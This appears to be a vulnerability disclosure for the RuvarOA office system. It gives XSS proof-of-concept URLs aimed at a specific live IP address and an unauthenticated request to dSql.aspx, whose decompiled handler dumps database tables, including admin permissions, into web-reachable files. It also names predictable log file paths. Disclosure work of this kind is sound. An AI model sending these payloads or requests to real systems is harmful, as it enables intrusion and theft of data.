http://112.74.79.113:8000/WebUtility/common_deal_top.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
http://112.74.79.113:8000/WorkFlow/wf_work_print.aspx?AutoPrint=xxxx%27;prompt(8);%2
All of the aforementioned XSS vulnerabilities are caused by the direct output of parameters into the page.
WebUtility/dSql.aspx
GET /WebUtility/dSql.aspx HTTP/1.1
Host: 112.74.79.113:8000
function btnMake_Click of calss dSql within the DLL file /RuvarOA/bin/WebUtility.dll
using System;
using System.Data;
using System.IO;
using System.Text;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;
namespace WebUtility;
public class dSql : Page
{
protected HtmlForm form1;
protected Button btnMake;
protected HtmlInputCheckBox sys_menu;
protected HtmlInputCheckBox sys_desk_setting;
protected HtmlInputCheckBox sys_desk_style;
protected HtmlInputCheckBox sys_property_tree;
protected HtmlInputCheckBox sys_pagelist_info;
protected HtmlInputCheckBox sys_pagelist_field;
protected HtmlInputCheckBox sys_base_field;
protected HtmlInputCheckBox sys_pageform_info;
protected HtmlInputCheckBox sys_baseinfo_type;
protected HtmlInputCheckBox sys_pagelist_search;
protected HtmlInputCheckBox msg_source;
protected HtmlInputCheckBox sys_admin_purview;
protected HtmlInputCheckBox wf_template;
protected HtmlInputCheckBox wf_template_field;
protected HtmlInputCheckBox flow_template;
protected HtmlInputCheckBox flow_field;
protected void Page_Load(object sender, EventArgs e)
{
}
protected void btnMake_Click(object sender, EventArgs e)
{
StringBuilder stringBuilder = new StringBuilder("version:" + DateTime.Now.ToString("yyyyMMdd.hhmm"));
string text = "";
string text2 = "";
string text3 = "\r\n";
string text4 = "";
string text5 = ((Page)this).Server.MapPath("/db/" + DateTime.Now.ToString("yyyy-MM-dd"));
StreamWriter streamWriter = null;
if (!Directory.Exists(text5))
{
Directory.CreateDirectory(text5);
}
for (int i = 0; i < ((Control)form1).Controls.Count; i++)
{
Control val = ((Control)form1).Controls[i];
if (val is HtmlInputCheckBox)
{
HtmlInputCheckBox val2 = (HtmlInputCheckBox)(object)((val is HtmlInputCheckBox) ? val : null);
if (val2.Checked)
{
string value = ((HtmlInputControl)val2).Value;
stringBuilder.Append(" truncate table " + value + " " + text3);
stringBuilder.Append("/* build " + value + " " + DateTime.Now.ToString() + " */" + text3);
string sQLString = "select * from " + value + " ";
DataTable dataTable = SqlHelper.QueryTable(sQLString);
sQLString = " truncate table " + value + " " + text3;
string text6 = sQLString;
sQLString = text6 + "/* build " + value + " " + DateTime.Now.ToString() + " */" + text3;
text6 = sQLString;
sQLString = text6 + "set IDENTITY_INSERT " + value + " on " + text3;
stringBuilder.Append("set IDENTITY_INSERT " + value + " on " + text3);
text2 = "";
for (int j = 0; j < dataTable.Columns.Count; j++)
{
text2 = ((!(text2 == "")) ? (text2 + "," + dataTable.Columns[j].ColumnName) : dataTable.Columns[j].ColumnName);
}
for (int j = 0; j < dataTable.Rows.Count; j++)
{
text = "if not exists(select * from " + value + " where " + dataTable.Columns[0].ColumnName + "='" + dataTable.Rows[j][dataTable.Columns[0].ColumnName].ToString() + "') ";
text6 = text;
text = text6 + "insert into " + value + "(" + text2 + ") values (";
for (int k = 0; k < dataTable.Columns.Count; k++)
{
if (k != 0)
{
text += ",";
}
text4 = Common.FixQuote(dataTable.Rows[j][dataTable.Columns[k].ColumnName].ToString());
if (text4 == "False")
{
text4 = "0";
}
if (text4 == "Tree")
{
text4 = "1";
}
text = text + "'" + text4 + "'";
}
text = text + ") " + text3;
stringBuilder.Append(text);
sQLString += text;
}
stringBuilder.Append("set IDENTITY_INSERT " + value + " off " + text3);
text6 = sQLString;
sQLString = text6 + "set IDENTITY_INSERT " + value + " off " + text3;
stringBuilder.Append("GO" + text3 + text3);
sQLString = sQLString + "GO" + text3 + text3;
streamWriter = new StreamWriter(text5 + "\\" + value + ".txt", append: false, Encoding.UTF8);
streamWriter.Write(sQLString);
streamWriter.Flush();
streamWriter.Close();
streamWriter.Dispose();
}
}
JS.AlertGoUrl("默认值生成成功!", "/webutility/dSql.aspx");
}
}
}
The log file format is year followed by date, such as 20240127. Access link: /logfiles/20240112.txt